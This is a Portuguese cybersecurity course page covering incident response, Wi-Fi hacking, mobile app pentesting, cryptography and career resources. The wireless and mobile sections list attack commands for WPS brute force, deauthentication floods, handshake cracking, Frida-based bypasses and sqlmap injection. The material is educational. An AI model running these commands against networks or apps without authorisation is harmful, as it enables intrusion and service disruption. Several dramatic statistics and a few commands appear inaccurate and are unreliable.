🚨 Indicadores de Comprometimento (IoCs)

Network IoCs:
  • • Conexões para IPs maliciosos conhecidos
  • • Tráfego DNS para domínios suspeitos
  • • Protocolos incomuns (IRC, P2P)
  • • Uploads de dados volumosos
  • • Beaconing (tráfego regular)
  • • Conexões criptografadas suspeitas
Behavioral Analysis:
  • • User-Agent strings anômalos
  • • Timing patterns suspeitos
  • • Múltiplas conexões falhadas
  • • Tráfego em horários incomuns
  • • Baseline deviation
  • • Lateral movement patterns

📊 Análise de Evidências e Relatórios

🔍 Análise Avançada:
  • • Timeline analysis (Super Timeline)
  • • Correlation de eventos
  • • Pattern recognition
  • • Statistical analysis
  • • Machine learning para anomalias
  • • Graph analysis (Maltego)
  • • YARA rules para malware
📝 Documentação Legal:
  • • Executive summary
  • • Metodologia utilizada
  • • Cadeia de custódia completa
  • • Findings técnicos detalhados
  • • Screenshots e evidências
  • • Conclusões e recomendações
  • • Anexos com dados técnicos

Incident Response

Resposta Rápida a Incidentes de Segurança Cibernética

🚨 PROTOCOLO DE EMERGÊNCIA CIBERNÉTICA

Incident Response é MISSÃO CRÍTICA! Cada minuto conta durante um incidente. Siga protocolos estabelecidos e mantenha comunicação com stakeholders.

EM CASO DE INCIDENTE ATIVO: Isole sistemas comprometidos, preserve evidências, acione equipe de resposta e documente todas as ações.

Framework NIST de Incident Response

1. Preparation

Preparação e Planejamento

2. Detection

Detecção e Análise

3. Containment

Contenção e Erradicação

4. Recovery

Recuperação e Lições

🛠️ Fase 1: Preparação

📋 Planejamento:
  • • Incident Response Plan (IRP)
  • • Roles and responsibilities
  • • Communication plan
  • • Escalation procedures
  • • Legal requirements
  • • Business continuity plan
👥 Equipe CSIRT:
  • • Incident Manager
  • • Security Analysts
  • • Forensics Specialists
  • • Network Engineers
  • • Legal Counsel
  • • Communications Lead
🛡️ Ferramentas:
  • • SIEM/SOC platform
  • • Forensics toolkit
  • • Communication tools
  • • Backup systems
  • • Isolation capabilities
  • • Documentation systems

🔍 Fase 2: Detecção e Análise

🚨 Fontes de Detecção:
  • • SIEM alerts
  • • IDS/IPS signatures
  • • Antivirus alerts
  • • User reports
  • • Network monitoring
  • • Threat intelligence feeds
  • • Honeypots
🔬 Análise Inicial:
  • • Severity assessment
  • • Impact analysis
  • • Indicator collection
  • • Timeline construction
  • • Attribution analysis
  • • Scope determination
  • • Evidence preservation

Classificação e Priorização de Incidentes

🚩 Matriz de Severidade

P1 - CRÍTICO

Sistemas críticos comprometidos, dados exfiltrados

< 1h
P2 - ALTO

Malware ativo, tentativa de lateral movement

< 4h
P3 - MÉDIO

Phishing direcionado, vulnerability exploitation

< 24h
P4 - BAIXO

Spam, port scanning, policy violations

< 72h

📊 Fatores de Classificação

#!/usr/bin/env python3
"""
Incident Classification Calculator
Calcula severidade baseada em múltiplos fatores
"""

def calculate_incident_severity(factors):
    """
    Calcula severidade do incidente (1-10)
    """
    score = 0
    
    # Impact on business (0-3)
    business_impact = {
        'none': 0,
        'minimal': 1,
        'significant': 2,
        'critical': 3
    }
    score += business_impact.get(factors.get('business_impact', 'none'), 0)
    
    # Data sensitivity (0-3)
    data_sensitivity = {
        'public': 0,
        'internal': 1,
        'confidential': 2,
        'restricted': 3
    }
    score += data_sensitivity.get(factors.get('data_sensitivity', 'public'), 0)
    
    # System criticality (0-2)
    system_criticality = {
        'non_critical': 0,
        'important': 1,
        'critical': 2
    }
    score += system_criticality.get(factors.get('system_criticality', 'non_critical'), 0)
    
    # Scope of incident (0-2)
    scope = {
        'single_system': 0,
        'multiple_systems': 1,
        'organization_wide': 2
    }
    score += scope.get(factors.get('scope', 'single_system'), 0)
    
    return min(score, 10)

# Exemplo de uso
incident_factors = {
    'business_impact': 'critical',
    'data_sensitivity': 'restricted',
    'system_criticality': 'critical', 
    'scope': 'organization_wide'
}

severity = calculate_incident_severity(incident_factors)
print(f"Incident Severity: {severity}/10")

if severity >= 8:
    print("Priority: P1 (Critical)")
elif severity >= 6:
    print("Priority: P2 (High)")
elif severity >= 4:
    print("Priority: P3 (Medium)")
else:
    print("Priority: P4 (Low)")

Contenção, Erradicação e Recuperação

🚧 Estratégias de Contenção

#!/bin/bash
# Incident Response Containment Script

echo "=== EMERGENCY CONTAINMENT PROCEDURES ==="

# 1. Network Isolation
echo "1. Network Isolation:"
echo "# Isolate compromised host"
iptables -A INPUT -s COMPROMISED_IP -j DROP
iptables -A OUTPUT -d COMPROMISED_IP -j DROP

echo "# Block malicious domains in DNS"
echo "0.0.0.0 malicious-domain.com" >> /etc/hosts

echo "# Firewall rules to block C2"
iptables -A OUTPUT -d MALICIOUS_IP -j DROP

# 2. Account Security
echo -e "\n2. Account Security:"
echo "# Disable compromised accounts"
usermod -L compromised_user
passwd -l compromised_user

echo "# Force password reset for affected users"
chage -d 0 affected_user

echo "# Revoke active sessions"
pkill -u compromised_user

# 3. Service Containment  
echo -e "\n3. Service Containment:"
echo "# Stop compromised services"
systemctl stop compromised_service
systemctl disable compromised_service

echo "# Quarantine suspicious files"
mv suspicious_file /quarantine/

echo "# Block file execution"
chmod -x suspicious_executable

# 4. Memory Dump (before shutdown)
echo -e "\n4. Evidence Preservation:"
echo "# Create memory dump"
dd if=/dev/mem of=/forensics/memory_dump.img

echo "# Preserve system state"
ps aux > /forensics/running_processes.txt
netstat -tulpn > /forensics/network_connections.txt
find /tmp -type f -exec ls -la {} \; > /forensics/temp_files.txt

# 5. System Snapshot
echo -e "\n5. System Snapshot:"
echo "# Create system image"
dd if=/dev/sda of=/forensics/system_image.img

echo "# Hash verification"
md5sum /forensics/system_image.img > /forensics/image_hash.md5

🔧 Erradicação e Recuperação

🗡️ Erradicação:
  • • Remove malware completamente
  • • Patch vulnerabilidades exploradas
  • • Update signatures e rules
  • • Rebuild sistemas comprometidos
  • • Reset credentials afetadas
  • • Validate IOCs removal
🔄 Recovery:
  • • Restore from clean backups
  • • Gradual service restoration
  • • Enhanced monitoring
  • • User access validation
  • • Performance monitoring
  • • Documentation update

Ferramentas e Automação CSIRT

🤖 SOAR Platforms

# TheHive + Cortex - Open Source SOAR
# Installation via Docker

# docker-compose.yml for TheHive
version: '3'
services:
  thehive:
    image: 'thehiveproject/thehive4:latest'
    ports:
      - '9000:9000'
    environment:
      - JVM_OPTS='-Xms1024M -Xmx1024M'
    volumes:
      - ./thehive/data:/opt/thp/thehive/data
      - ./thehive/index:/opt/thp/thehive/index
    
  cortex:
    image: 'thehiveproject/cortex:latest'  
    ports:
      - '9001:9001'
    volumes:
      - ./cortex/application.conf:/etc/cortex/application.conf

# Phantom (Splunk SOAR)
# Commercial platform with playbook automation

# MISP (Malware Information Sharing Platform)
# Threat intelligence and IOC sharing
docker run -it -p 80:80 -p 443:443 coolacid/misp

# Shuffle - Open Source SOAR
# Workflow automation for security teams
docker run -p 3001:3001 -d frikky/shuffle:latest

📊 SIEM Integration

# ELK Stack (Elasticsearch, Logstash, Kibana)
# Wazuh - Open Source SIEM

# Wazuh Manager installation
curl -sO https://packages.wazuh.com/4.x/wazuh-install.sh
bash wazuh-install.sh -a

# Splunk Universal Forwarder
wget -O splunkforwarder.tgz 'https://download.splunk.com/...'
tar -xzf splunkforwarder.tgz
cd splunkforwarder/bin
./splunk start --accept-license

# OSSIM/AlienVault (AT&T Cybersecurity)
# Unified Security Management platform

# Graylog - Log Management
docker run --name mongo -d mongo:4.2
docker run --name elasticsearch -d elasticsearch:7.10.2
docker run --name graylog -p 9000:9000 -d graylog/graylog:4.2

# Custom SIEM Rules for IR
# Splunk Search for lateral movement
index=security EventCode=4624 LogonType=3 
| stats count by Account_Name dest 
| where count > 10

# ELK Query for suspicious PowerShell
GET /winlogbeat-*/_search
{
  "query": {
    "bool": {
      "must": [
        {"match": {"event.code": "4104"}},
        {"regexp": {"winlog.event_data.ScriptBlockText": ".*invoke.*expression.*"}}
      ]
    }
  }
}

📢 Comunicação e Relatórios de Incidentes

👥 Stakeholders:
  • • Executive Leadership (C-Level)
  • • IT Operations Team
  • • Legal Department
  • • Public Relations
  • • Regulatory Bodies
  • • Law Enforcement (se necessário)
  • • Customers/Partners afetados
📋 Elementos do Relatório:
  • • Executive Summary
  • • Timeline detalhada
  • • Impact assessment
  • • Root cause analysis
  • • Actions taken
  • • Lessons learned
  • • Recommendations
⚖️ Compliance:
  • • LGPD notification (72h)
  • • Regulatory reporting
  • • Insurance claims
  • • Audit requirements
  • • Industry disclosure
  • • Customer notification
  • • Media statements

Wireless Security

Segurança em Redes Sem Fio - Wi-Fi Hacking e Proteção

🌐 SEGURANÇA WIRELESS: O FRONTE INVISÍVEL

As redes sem fio são o ponto de entrada mais comum para ataques! 80% dos ataques cibernéticos começam por vulnerabilidades Wi-Fi.

OBJETIVO: Aprender a identificar, testar e proteger redes wireless usando ferramentas avançadas no Termux.

Framework de Segurança Wireless

1. Recon

Descoberta de Redes

2. Cracking

Quebra de Senhas

3. Monitoring

Monitoramento

4. Protection

Proteção e Defesa

🔍 Fase 1: Reconhecimento Wireless

🛠️ Ferramentas de Descoberta:
  • iwconfig - Configuração de interfaces
  • airmon-ng - Modo monitor
  • airodump-ng - Scan de redes
  • wash - Detecção WPS
  • kismet - Sniffing avançado
📊 Comandos Essenciais:
iwconfig
Ver interfaces wireless disponíveis
airmon-ng start wlan0
Ativar modo monitor
airodump-ng wlan0mon
Escanear redes Wi-Fi

🔓 Fase 2: Cracking de Senhas Wi-Fi

🎯 Ataques Principais:
  • WEP: RC4 vulnerável - crack em minutos
  • WPA: Handshake capture + wordlist attack
  • WPA2: PMKID attack (menos handshakes)
  • WPA3: Mais seguro, mas vulnerável a downgrade
  • WPS: PIN brute force (8 dígitos)
⚡ Ataques Rápidos:
reaver -i wlan0mon -b [BSSID] -vv
Ataque WPS (se habilitado)
aircrack-ng -w wordlist.txt capture.cap
Crack WPA handshake
hcxdumptool -i wlan0mon -o dump.pcapng
Captura PMKID para hashcat

👁️ Fase 3: Monitoramento e Sniffing

📡 Técnicas Avançadas:
  • Deauthentication: Forçar reconexão para capture
  • Evil Twin: AP falso para MITM
  • Packet Injection: Injetar pacotes na rede
  • Channel Hopping: Monitorar múltiplos canais
  • Signal Analysis: Análise de força do sinal
🔧 Ferramentas de Monitoramento:
aireplay-ng -0 5 -a [BSSID] wlan0mon
Deauth attack (5 pacotes)
mdk4 wlan0mon d -B [BSSID]
Deauth massivo
tcpdump -i wlan0mon -w capture.pcap
Captura de pacotes

🛡️ Fase 4: Proteção e Boas Práticas

🔒 Configurações Seguras:
  • WPA3: Padrão mais seguro disponível
  • Desabilitar WPS: Remove vetor de ataque
  • Mudar SSID padrão: Evita reconhecimento
  • MAC Filtering: Controle de acesso
  • Segmentação: Redes guest separadas
  • Monitoramento: Logs e alertas
⚠️ Riscos Comuns:
Senhas Fracas: 90% das redes usam senhas crackáveis
WPS Habilitado: Ataque em até 4 horas
APs Antigos: Firmware desatualizado

Instalação das Ferramentas Wireless

📦 Pacotes Essenciais:

Aircrack-ng Suite:
pkg install aircrack-ng
Reaver (WPS):
pkg install reaver
Hashcat:
pkg install hashcat
Tcpdump/Wireshark:
pkg install tcpdump wireshark

⚠️ Requisitos de Hardware:

  • • Chipset wireless compatível (ex: Atheros, Ralink)
  • • Suporte a modo monitor e packet injection
  • • Adaptadores externos recomendados para melhor performance
  • • Root access necessário para algumas ferramentas

Cenários Práticos de Wireless Security

🎯 Cenário 1: Auditoria Wi-Fi Empresarial

1.
Recon: Mapear todas as APs e clientes airodump-ng -c 6 --bssid [BSSID] wlan0mon
2.
Teste: Verificar força das senhas aircrack-ng -w rockyou.txt capture.cap
3.
Relatório: Documentar vulnerabilidades encontradas

🚨 Cenário 2: Detecção de Rogue APs

1.
Monitor: Identificar APs não autorizados kismet -c wlan0mon
2.
Analyze: Verificar sinais suspeitos tcpdump -i wlan0mon -n | grep -i beacon
3.
Mitigate: Desconectar dispositivos comprometidos

Mobile Security

Segurança em Dispositivos Móveis - Android & iOS Hacking

📱 SEGURANÇA MOBILE: O DISPOSITIVO NA SUA MÃO

Dispositivos móveis são computadores pessoais! 90% dos usuários não protegem adequadamente seus smartphones e tablets.

OBJETIVO: Aprender a auditar, testar e proteger aplicações móveis usando ferramentas avançadas no Termux e além.

Framework de Segurança Mobile

1. Recon

Análise de Apps

2. Reverse

Engenharia Reversa

3. Testing

Teste de Segurança

4. Protection

Proteção & Hardening

🔍 Fase 1: Análise e Reconhecimento de Apps

🛠️ Ferramentas de Análise:
  • apktool - Decompilar APKs
  • jadx - Decompilador Java
  • dex2jar - DEX para JAR
  • frida - Dynamic analysis
  • objection - Runtime mobile exploration
📊 Comandos Essenciais:
apktool d app.apk
Decompilar APK
jadx -d output app.apk
Decompilar com JADX
frida-ps -U
Listar processos no dispositivo

🔧 Fase 2: Engenharia Reversa e Análise Estática

🎯 Técnicas Principais:
  • Manifest Analysis: Permissões e componentes
  • Code Review: Análise de vulnerabilidades
  • Certificate Pinning: Bypass de pinning SSL
  • Obfuscation: Técnicas anti-reversing
  • API Analysis: Endpoints e comunicação
⚡ Ataques Comuns:
grep -r "api_key\|secret" decompiled/
Buscar chaves hardcoded
strings app.apk | grep -i password
Buscar strings suspeitas
frida -U -l script.js com.app.package
Hook runtime com Frida

🧪 Fase 3: Teste Dinâmico e Pentesting Mobile

📱 Testes de Segurança:
  • Network Interception: MITM com Burp/ZAP
  • Root Detection: Bypass de detecção de root
  • Jailbreak Detection: Bypass iOS jailbreak
  • Biometric Bypass: Ataques a autenticação
  • Runtime Manipulation: Modificação em tempo real
🔧 Ferramentas de Teste:
mitmproxy --mode transparent
Interceptar tráfego HTTPS
drozer console connect
Teste de segurança Android
needle
Pentesting iOS

🛡️ Fase 4: Proteção e Hardening Mobile

🔒 Boas Práticas:
  • Code Obfuscation: ProGuard/R8 para Android
  • Certificate Pinning: Implementar pinning SSL
  • Root Detection: Detectar dispositivos rooted
  • Anti-Tampering: Proteção contra modificações
  • Secure Storage: KeyStore/Keystore iOS
⚠️ Riscos Críticos:
Hardcoded Secrets: 70% dos apps têm chaves expostas
Weak Encryption: Uso inadequado de criptografia
Insecure Storage: Dados sensíveis em plain text

Instalação das Ferramentas Mobile

📦 Pacotes Essenciais:

Android Tools:
pkg install apktool pkg install dex2jar pkg install jadx
Runtime Analysis:
pkg install python pip install frida-tools pip install objection

⚠️ Requisitos para Mobile Pentesting:

  • • Dispositivo Android/iOS para testes
  • • ADB (Android Debug Bridge) instalado
  • • USB debugging habilitado
  • • Permissões de desenvolvedor
  • • Root/Jailbreak opcional mas recomendado

Cenários Práticos de Mobile Security

🔍 Auditoria de App Banking

1.
Reverse: Decompilar e analisar código jadx -d banking_app app.apk
2.
Test: Verificar armazenamento seguro frida -U -l storage_hook.js com.banking.app
3.
Report: Documentar vulnerabilidades encontradas

🚨 Teste de API Mobile

1.
Intercept: Capturar tráfego da API mitmproxy --mode upstream
2.
Exploit: Testar injeção e bypass sqlmap -r request.txt --batch
3.
Secure: Recomendar melhorias de segurança

Cryptography

Criptografia Moderna - Cifras, Hashes e Certificados Digitais

🔐 CRIPTOGRAFIA: A CIÊNCIA DA SEGURANÇA

A criptografia é a base da segurança digital! Sem ela, não há privacidade, autenticidade ou integridade na internet.

OBJETIVO: Dominar algoritmos criptográficos, implementação prática e ataques comuns usando ferramentas no Termux.

Framework de Criptografia

1. Symmetric

Criptografia Simétrica

2. Asymmetric

Criptografia Assimétrica

3. Hashing

Funções Hash

4. PKI

Infraestrutura de Chaves

🔒 Fase 1: Criptografia Simétrica

🛠️ Algoritmos Principais:
  • AES - Advanced Encryption Standard (128/256 bits)
  • ChaCha20 - Stream cipher moderno
  • 3DES - Triple DES (obsoleto)
  • Blowfish - Algoritmo flexível
  • Twofish - Sucessor do Blowfish
📊 Modos de Operação:
openssl enc -aes-256-cbc -salt -in file.txt -out file.enc
Criptografar com AES-CBC
openssl enc -aes-256-gcm -in file.txt -out file.enc
Criptografar com AES-GCM (autenticado)
gpg --symmetric --cipher-algo AES256 file.txt
Criptografar com GPG

🔄 Fase 2: Criptografia Assimétrica

🎯 Algoritmos RSA & ECC:
  • RSA: Baseado em fatoração (1024-4096 bits)
  • ECDSA: Curvas elípticas para assinatura
  • Ed25519: Curva Edwards moderna
  • ECDH: Troca de chaves Diffie-Hellman
  • Hybrid: Combinação simétrica/assimétrica
⚡ Geração e Uso:
openssl genrsa -out private.pem 2048
Gerar chave privada RSA
openssl rsa -in private.pem -pubout -out public.pem
Extrair chave pública
ssh-keygen -t ed25519 -C "your_email@example.com"
Gerar chave Ed25519

🔢 Fase 3: Funções Hash e Integridade

📋 Funções Hash:
  • SHA-256: Padrão atual (resistente a colisões)
  • SHA-3: Nova família Keccak
  • BLAKE2: Alternativa moderna ao SHA
  • MD5: Obsoleto (vulnerável)
  • HMAC: Hash com chave (autenticação)
🔍 Verificação e Ataques:
sha256sum file.txt
Calcular hash SHA-256
openssl dgst -sha256 -hmac "secret" file.txt
Calcular HMAC-SHA256
hashcat -m 0 -a 0 hash.txt wordlist.txt
Crack hash MD5

📜 Fase 4: PKI e Certificados Digitais

🔐 Componentes PKI:
  • CA (Certificate Authority): Emite certificados
  • CSR (Certificate Signing Request): Solicitação
  • CRL (Certificate Revocation List): Lista de revogação
  • OCSP: Verificação online de status
  • HSTS: HTTP Strict Transport Security
⚠️ Ataques e Vulnerabilidades:
Heartbleed: Buffer overflow no OpenSSL
POODLE: Ataque ao SSLv3
Certificate Pinning Bypass: Ataques a pinning

Instalação das Ferramentas de Criptografia

📦 Pacotes Essenciais:

OpenSSL Suite:
pkg install openssl pkg install openssl-tool
Hash & Crypto Tools:
pkg install hashcat pkg install john pkg install gpg

⚠️ Práticas de Segurança:

  • • Use sempre algoritmos modernos (AES-256, SHA-256, Ed25519)
  • • Evite algoritmos obsoletos (DES, MD5, RC4)
  • • Implemente perfect forward secrecy (ECDHE)
  • • Use certificados válidos e atualizados
  • • Monitore vulnerabilidades em bibliotecas criptográficas

Cenários Práticos de Criptografia

🔐 Criptografia de Arquivos Sensíveis

1.
Encrypt: Criptografar arquivo com AES openssl enc -aes-256-gcm -salt -in secret.txt -out secret.enc
2.
Verify: Calcular e verificar hash sha256sum secret.txt > secret.sha256
3.
Decrypt: Descriptografar quando necessário openssl enc -d -aes-256-gcm -in secret.enc -out secret.txt

🔓 Análise de Certificados SSL/TLS

1.
Inspect: Examinar certificado do site openssl s_client -connect example.com:443 -servername example.com
2.
Test: Verificar vulnerabilidades SSL sslscan example.com
3.
Report: Documentar configurações de segurança

Carreira em CyberSec

Construa uma Carreira de Sucesso em Segurança Cibernética

🚀 CARREIRA EM CYBERSEC: O CAMINHO PARA O SUCESSO

O mercado de cibersegurança cresce 25% ao ano! Há mais de 3 milhões de vagas em aberto globalmente.

OBJETIVO: Guiar você desde o início da carreira até posições sênior, com roadmap claro, certificações e estratégias de crescimento profissional.

Roadmap de Carreira em CyberSec

1. Iniciante

Junior/Trainee

2. Pleno

Analista/Mid-level

3. Sênior

Especialista/Senior

4. Líder

Manager/Director

🌱 Fase 1: Iniciante (0-2 anos)

🎯 Objetivos Iniciais:
  • • Aprender fundamentos de redes e sistemas
  • • Obter primeira certificação (CompTIA Security+)
  • • Desenvolver habilidades básicas em Linux
  • • Participar de CTFs e bug bounties
  • • Construir portfólio no GitHub
💼 Cargos de Entrada:
Cybersecurity Analyst I
R$ 4.000 - R$ 6.000
IT Security Junior
R$ 3.500 - R$ 5.500
SOC Analyst Trainee
R$ 4.500 - R$ 7.000

👤 Fase 2: Pleno (2-5 anos)

🚀 Certificações Essenciais:
  • CEH (Certified Ethical Hacker): Pentesting básico
  • CISSP: Gestão de segurança (difícil)
  • OSCP: Pentesting prático (muito respeitado)
  • CompTIA CySA+: Análise de segurança
  • AWS Security: Cloud security
💰 Salários e Oportunidades:
Penetration Tester
R$ 8.000 - R$ 15.000
Security Analyst
R$ 7.000 - R$ 12.000
Incident Responder
R$ 9.000 - R$ 16.000

👑 Fase 3: Sênior (5+ anos)

🎖️ Especializações Avançadas:
  • Red Team Lead: Coordenação de ataques simulados
  • Security Architect: Design de sistemas seguros
  • Threat Hunter: Caça a ameaças avançadas
  • Forensic Analyst: Investigação digital
  • DevSecOps Engineer: Segurança em desenvolvimento
💎 Salários Sênior:
Security Architect
R$ 18.000 - R$ 35.000
CISO (Chief Info Sec Officer)
R$ 25.000 - R$ 50.000+
Red Team Lead
R$ 20.000 - R$ 40.000

⭐ Fase 4: Liderança (8+ anos)

🏢 Posições Executivas:
  • CISO: Chief Information Security Officer
  • CSO: Chief Security Officer
  • VP of Security: Vice President of Security
  • Security Director: Diretor de Segurança
  • Consultor Sênior: Consultoria independente
🎯 Habilidades Executivas:
Gestão de Riscos: Avaliação e mitigação estratégica
Liderança: Gerenciamento de equipes de segurança
Compliance: LGPD, ISO 27001, NIST, etc.

Ferramentas para Desenvolvimento de Carreira

📚 Plataformas de Aprendizado:

Certificações Online:
Coursera - Cybersecurity Specialization Udemy - Ethical Hacking Masterclass TryHackMe - Rooms interativas
Comunidades:
OWASP - Open Web Application Security DEF CON - Conferência hacker Reddit r/netsec, r/cybersecurity

⚠️ Dicas para Carreira:

  • • Construa um portfólio forte no GitHub com projetos de segurança
  • • Participe de CTFs (Capture The Flag) regularmente
  • • Contribua para projetos open source de segurança
  • • Faça networking em conferências e meetups
  • • Mantenha-se atualizado com as últimas ameaças e vulnerabilidades
  • • Desenvolva habilidades soft como comunicação e liderança

Cenários de Carreira em CyberSec

🎯 Carreira Técnica (Red Team/Blue Team)

1.
Pentester: Especialista em testes de invasão OSCP, CEH, eXPT certificações
2.
SOC Analyst: Monitoramento 24/7 de ameaças SIEM, IDS/IPS, threat intelligence
3.
Forense: Investigação de incidentes digitais EnCase, FTK, Volatility, Autopsy

🏢 Carreira Corporativa (Governance/Risk)

1.
Compliance Officer: Garantia de conformidade LGPD, ISO 27001, NIST, SOX
2.
Risk Manager: Gestão de riscos corporativos Risk assessment, BCP, DRP
3.
CISO: Liderança executiva em segurança Estratégia, orçamento, governança

Recursos e Labs

Plataformas de Aprendizado, Laboratórios e Recursos Essenciais

📚 RECURSOS E LABS: SUA BIBLIOTECA DE CONHECIMENTO

Aprender cybersecurity é uma jornada contínua! Aqui você encontra as melhores plataformas, labs e recursos para prática.

OBJETIVO: Fornecer um guia completo de recursos gratuitos e pagos para dominar cada aspecto da segurança cibernética.

Ecossistema de Aprendizado

1. Plataformas

Cursos Online

2. Labs

Prática Hands-on

3. Comunidades

Networking

4. Ferramentas

Recursos Técnicos

🎓 Fase 1: Plataformas de Aprendizado

💎 Plataformas Premium:
  • Coursera: Cybersecurity Specializations (Google, IBM)
  • Udemy: 500+ cursos de segurança (descontos frequentes)
  • Pluralsight: Paths estruturados por carreira
  • LinkedIn Learning: Cursos profissionais
  • Offensive Security: PWK/OSCP training oficial
🆓 Recursos Gratuitos:
Cybrary: Cursos gratuitos de alta qualidade cybrary.it
OWASP: Recursos de application security owasp.org
NIST: Frameworks e publicações oficiais nist.gov

🧪 Fase 2: Laboratórios Práticos

🎯 CTF Platforms:
  • HackTheBox: Máquinas vulneráveis (VIP necessário)
  • TryHackMe: Rooms guiadas (gratuito básico)
  • CTFtime: Lista de competições CTF
  • PicoCTF: CTF educacional (gratuito)
  • CyberSecLabs: Labs corporativos
💻 Ambientes de Teste:
Metasploitable: VM vulnerável para prática Download no SourceForge
DVWA: Damn Vulnerable Web App github.com/digininja/DVWA
VulnHub: VMs vulneráveis gratuitas vulnhub.com

👥 Fase 3: Comunidades e Networking

🌐 Fóruns e Reddit:
  • r/netsec: Discussões técnicas avançadas
  • r/cybersecurity: Notícias e carreira
  • r/HowToHack: Tutoriais e dicas
  • r/AskNetsec: Perguntas e respostas
  • Hacker News: Notícias tech e security
🎪 Conferências:
DEF CON: Maior conferência hacker do mundo defcon.org
Black Hat: Conferência técnica avançada blackhat.com
BSides: Conferências locais gratuitas bsides.com

🔧 Fase 4: Ferramentas e Recursos Técnicos

📖 Documentação Oficial:
  • MITRE ATT&CK: Matriz de técnicas de ataque
  • CVE Details: Base de vulnerabilidades
  • Exploit-DB: Exploits públicos
  • Packet Storm: Security tools e papers
  • SecurityFocus: Vulnerabilidades e advisories
📰 Fontes de Notícias:
Krebs on Security: Blog de Brian Krebs krebsonsecurity.com
Bleeping Computer: Notícias de segurança bleepingcomputer.com
The Hacker News: Notícias diárias thehackernews.com

Setup Essencial para Cybersecurity

💻 Distribuições Linux para Security:

Kali Linux:
wget https://kali.org/get-kali/ Distribuição mais popular para pentesting
Parrot Security:
wget https://parrotsec.org/download/ Alternativa leve ao Kali
BlackArch:
wget https://blackarch.org/downloads.html 2.000+ ferramentas de segurança
Termux (Mobile):
pkg install aircrack-ng nmap Ferramentas básicas no Android

⚠️ Dicas para Ambiente de Aprendizado:

  • • Use máquinas virtuais (VirtualBox/VMware) para testes seguros
  • • Configure VPN para proteger seu tráfego durante testes
  • • Faça backups regulares de suas configurações
  • • Aprenda a usar Git para versionar seus scripts e ferramentas
  • • Documente tudo que você aprende em um caderno pessoal
  • • Pratique regularmente - consistência é mais importante que intensidade

Caminho de Aprendizado Estruturado

📚 Plano de Estudos para Iniciantes

1-2 meses:
Fundamentos: Redes, Linux, programação básica Cybrary, Network+, Linux Academy
3-4 meses:
Security Basics: OWASP Top 10, criptografia CompTIA Security+, TryHackMe
5-6 meses:
Prática: CTFs, labs, primeiros exploits HackTheBox, VulnHub, CTFtime

🎯 Certificações Recomendadas

Entry:
CompTIA Security+: Base sólida de conceitos ~R$ 1.200, 3 horas de prova
Mid:
CEH ou OSCP: Pentesting hands-on CEH: ~R$ 800 | OSCP: ~R$ 1.500
Advanced:
CISSP ou OSCE: Carreira sênior CISSP: ~R$ 2.500 | OSCE: ~R$ 1.800